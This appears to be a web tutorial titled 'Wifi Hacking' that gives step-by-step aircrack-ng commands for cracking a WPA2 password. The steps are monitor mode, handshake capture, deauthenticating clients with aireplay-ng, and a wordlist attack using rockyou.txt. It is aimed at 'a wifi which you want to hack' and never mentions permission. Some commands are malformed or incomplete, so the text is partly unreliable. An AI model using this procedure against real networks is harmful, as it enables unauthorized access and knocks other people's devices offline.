Wifi Hacking

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitoring mode and can sniff 802.11a, 802.11b and 802.11g traffic. Aircrack-ng comes pre installed with kali linux .

If your are running an linux system you install aircrack-ng by running the below command:
sudo apt install aircrack-ng
WPA2 wifi use strong encryption algortithm but not unbreakable.WPA2 wifi share its password in a 4 way handshake. So we prepare ourselves for a handshake and crack the encrypted password

Execution:


1.Setting up the monitor interface to make the traffic visible

#airmon-ng start interface
airmon-ng start wlan0

2.Capturing the traffic using airodump-ng

#airodump-ng interface
airodump-ng wlan0mon

3.Consider a wifi which you want to hack .
Note its channel no, bssid.

#airodump-ng -c channel --bssid bssid -w path to write handshake files monitorinterface
airodump-ng -c 11 -bssid ------------ -w /home/Desktop wlan0mon

4.Now,the handshake files are created.We can start for a handshake using aireplay-ng.Type the below command in another terminal.
#aireplay-ng -a bssid -e essid --deauth 2 interface
Either --deauth or -0 can be used.Both work as same.We can change the value of deauth according to number of clients we wanted to deauthenticate.

5.We can see that the wifi received its handshake.
The encrypted passwords are captured in the handshake file and we need to crack them using a wordlist file.
Wordlist files are by default available in kali linux.
Search rockyou.txt in wordlists folder.
aircrack-ng -b -a value -w /path to wordlist/ /path to handshake files/

-a is attack type
WPA2-2
WEP-1

6.The handshake files go on through the wordlist file and crack the password!!!!.
Note:During this process wifi gets disconnected to reconect type below commands

#airmon-ng stop
airmon-ng stop wlan0mon
service network-manager restart

Finally we hacked a wifi !!!

Select theme colour

Stylesheet switching is done via JavaScript and can cause a blink while page loads. This will not happen in your production code.